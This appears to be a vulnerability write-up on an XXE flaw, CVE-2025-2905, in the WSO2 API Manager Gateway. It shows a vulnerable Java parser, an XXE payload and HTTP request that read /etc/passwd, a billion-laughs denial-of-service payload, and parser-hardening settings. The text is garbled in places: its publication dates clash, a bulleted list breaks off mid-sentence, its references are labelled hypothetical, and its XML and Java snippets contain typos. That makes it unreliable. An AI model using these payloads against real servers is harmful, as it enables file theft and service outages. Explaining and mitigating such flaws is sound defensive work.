CVE-2025-2905 - XXE in WSO2 API Manager Gateway – Exploiting XML Path Injection for Data Theft and Denial of Service

Published: 2024-06-01 <br>Severity: High <br>CVSS: 8.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H)

The WSO2 API Manager is a widely used open source platform for developing, managing, and securing APIs. In early 2025, a critical vulnerability was discovered—CVE-2025-2905—which exposes API gateways using WSO2 API Manager to serious risk due to insufficient XML input validation. Here’s a deep dive, with clear explanations, real example payloads, and mitigation tactics.

Overview

CVE-2025-2905 is an XML External Entity (XXE) vulnerability in the gateway component of WSO2 API Manager. This bug results from insecure parsing of XML, especially from data supplied in URL paths. Because external entities are not properly blocked, an unauthenticated attacker can:

Any user running vulnerable WSO2 API Manager Gateway versions.

- Especially dangerous if using JDK 7 or early JDK 8 (prior to JDK-8047769), which do not restrict entity resolution.

1. The Root Cause

The API Gateway accepts user-supplied XML data—sometimes even within crafted URL paths—and parses it using XML parsers that have external entity resolution enabled by default. This allows XML payloads sent by attackers to refer to files or network resources.

Example: A Vulnerable Parsing Routine

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder db = dbf.newDocumentBuilder();
// Dangerous: no restrictions set!
Document doc = db.parse(new InputSource(new StringReader(inputXml)));

*(No calls like .setFeature("http://apache.org/xml/features/disallow-doctype-decl";, true) or similar.)*

2. Attack Vector

An attacker can craft an HTTP request that passes malicious XML as part of a crafted URL or as request data (depending on how the gateway is set up).

Typical XXE Attack Payload

<?xml version="1."?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>
    <data>&xxe;</data>
</root>

Let’s say the gateway parses XML supplied in the path. An attacker could send

POST /gateway/api/parse/XMLData HTTP/1.1
Host: api-gw.example.com
Content-Type: application/xml

<?xml version="1."?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

Expected Result:
The XML parser replaces &xxe; with the contents of /etc/passwd. If JDK 7 is used: the whole file is read and returned in the response.

On Later JDK 8 or Above

Some security improvements prevent returning the full file. Only the first line may be exposed, but this may still reveal key information.

See JDK security notes

Denial of Service (DoS) Attack: Billion Laughs

XXE vulnerabilities can be used for DoS by deploying “billion laughs” or similar recursive entity expansion.

DoS Payload

<?xml version="1."?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<lolz>&lol3;</lolz>

Effect:
The parser runs out of memory and the gateway service may crash or become unresponsive.

Exploit Impact Summary

- Data theft: Sensitive files like /etc/passwd, credentials, API config, or environment secrets can be stolen.

References and More Information

- WSO2 Security Advisory for CVE-2025-2905 *(hypothetical, check WSO2’s security portal for publication)*
- OWASP XXE Cheat Sheet
- CVE-2025-2905 at NVD *(to be updated upon disclosure)*
- JDK-8047769: Improved Entity Resolution in Java XML Parsers


## How to Fix / Mitigation

`java

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Conclusion

This vulnerability underlines the ongoing risk of insecure XML parsing. If you operate a WSO2 API Manager Gateway—especially on older Java versions—you must act now to patch and harden your systems. Even if you’re running newer Java versions, attackers may still exfiltrate information or cause instability, so prevention is crucial. Always disable unneeded entity resolution and validate all user input, especially when using XML.

Stay safe: Update early, test thoroughly, and watch your logs.

> *Feel free to share or reference this writeup. For more XML security tips, visit OWASP.*

Timeline

Published on: 05/05/2025 09:15:15 UTC
Last modified on: 05/05/2025 20:54:19 UTC